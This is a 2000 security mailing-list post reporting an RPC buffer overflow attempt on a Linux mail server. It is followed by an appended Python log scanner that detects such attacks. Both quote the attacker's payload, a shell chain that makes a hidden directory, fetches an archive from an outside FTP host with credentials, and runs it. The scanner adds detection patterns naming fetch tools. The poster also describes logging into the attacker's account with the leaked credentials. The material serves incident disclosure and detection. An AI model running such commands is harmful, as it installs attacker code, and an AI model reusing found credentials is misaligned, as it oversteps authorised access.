Security Incidents mailing list archives

Crack attempt last weekend


From: Nick Ruisi <n_ruisi () SOFTHOME NET>
Date: Sun, 26 Nov 2000 07:27:52 -0500

Last weekend someone made an attempt at my Red Hat Linux mail server. I
am sharing this with you all so you can protect yourself against it.

While looking through my /var/log/messages file, I noticed a line from
in.rpcd (don't ask why I haven't disabled it - I hadn't realised it was
running). It appears someone was 1) Spoofing themselves as "localhost"
and 2) Attempting to overflow the rpc buffer. At the end of the
"overflow string" were the following commands:

/bin/sh;mkdir /usr/man/man5/.sart;cd /usr/man/man5/.sart;ncftpget -u
agg0 -p sei 209.202.197.152 . c.tar.gz;tar xzvf c.tar.gz;./i

Yes, I have posted this individual's FTP username and password. They
left it in my logfile. Using that information, I was able to determine
that Lycos owns the netblock of the FTP server (it's a Tripod homepages
host). So I logged onto Tripod with that username and password and was
able to determine that someone created the account for an identity named
Cara Freda (freda () emd2 org). The emd2.org domain appears to be all about
hacking and cracking/warez.

Be careful out there!

- Nick Ruisi
  Linux Admin

P.S. I have already notified all service providers involved (Lycos,
NameZero, Tripod, Angelfire) and they have not responded to me.
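Added here as an example, not part of Nick's post: a small Python scanner that flags syslog lines of the kind he describes (an RPC daemon message whose tail is a chain of shell commands) and pulls out the pieces an abuse report needs (download host, drop directory, whether credentials were left in the log). The sample log lines are constructed to resemble the post; the daemon name "in.rpcd" comes from the post and the exact message layout is an assumption.

```python
import re
from dataclasses import dataclass

# Constructed sample lines modelled on the post; not the author's actual log.
SAMPLE_LOG = """\
Nov 18 02:11:07 mail in.rpcd[812]: connect from localhost
Nov 18 02:11:07 mail in.rpcd[812]: AAAAAAAAAAAAAAAAAAAAAAAAAAAA/bin/sh;mkdir /usr/man/man5/.sart;cd /usr/man/man5/.sart;ncftpget -u agg0 -p sei 209.202.197.152 . c.tar.gz;tar xzvf c.tar.gz;./i
Nov 18 02:15:32 mail sendmail[830]: from=<alice@example.org>, size=1024, nrcpts=1
Nov 18 02:20:01 mail CROND[850]: (root) CMD (run-parts /etc/cron.hourly)
"""

# Classic syslog layout: timestamp, host, program[pid]: message (assumed format).
SYSLOG = re.compile(r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) (?P<prog>[^\[:]+)(?:\[\d+\])?: (?P<msg>.*)$")
# Three or more ';'-separated commands with a shell, a fetch tool or a relative
# executable is not something a daemon writes in a normal log message.
CMD_CHAIN = re.compile(r"(?:/bin/sh|ncftpget|wget|ftp |tar x|\./)")
HIDDEN_DIR = re.compile(r"(?:/[\w.-]+)*/\.[\w-]+")   # e.g. /usr/man/man5/.sart
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

@dataclass
class Finding:
    severity: str
    prog: str
    reason: str
    commands: list
    remote_host: str = ""
    drop_dir: str = ""
    credentials_in_log: bool = False

def inspect_line(line):
    """Return a Finding for one syslog line, or None if it looks normal."""
    m = SYSLOG.match(line)
    if not m:
        return None
    prog, msg = m["prog"].strip(), m["msg"]
    parts = [p.strip() for p in msg.split(";") if p.strip()]
    if len(parts) >= 3 and CMD_CHAIN.search(msg):
        ip, ddir = IPV4.search(msg), HIDDEN_DIR.search(msg)
        return Finding("high", prog, "shell command chain in daemon log (overflow payload)",
                       parts, ip.group() if ip else "", ddir.group() if ddir else "",
                       bool(re.search(r"\s-u\s+\S+.*\s-p\s+\S+", msg)))
    # A network RPC daemon reporting its peer as localhost is the spoof the post describes.
    if prog.startswith(("in.rpc", "rpc.")) and "connect from localhost" in msg:
        return Finding("low", prog, "RPC daemon reports peer as localhost (possible spoof)", [])
    return None

def scan(text):
    """Run inspect_line over every line of a log and keep the findings."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]
```

Running `scan(SAMPLE_LOG)` yields one low finding for the localhost connect and one high finding carrying the six commands, the download host and the hidden directory.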

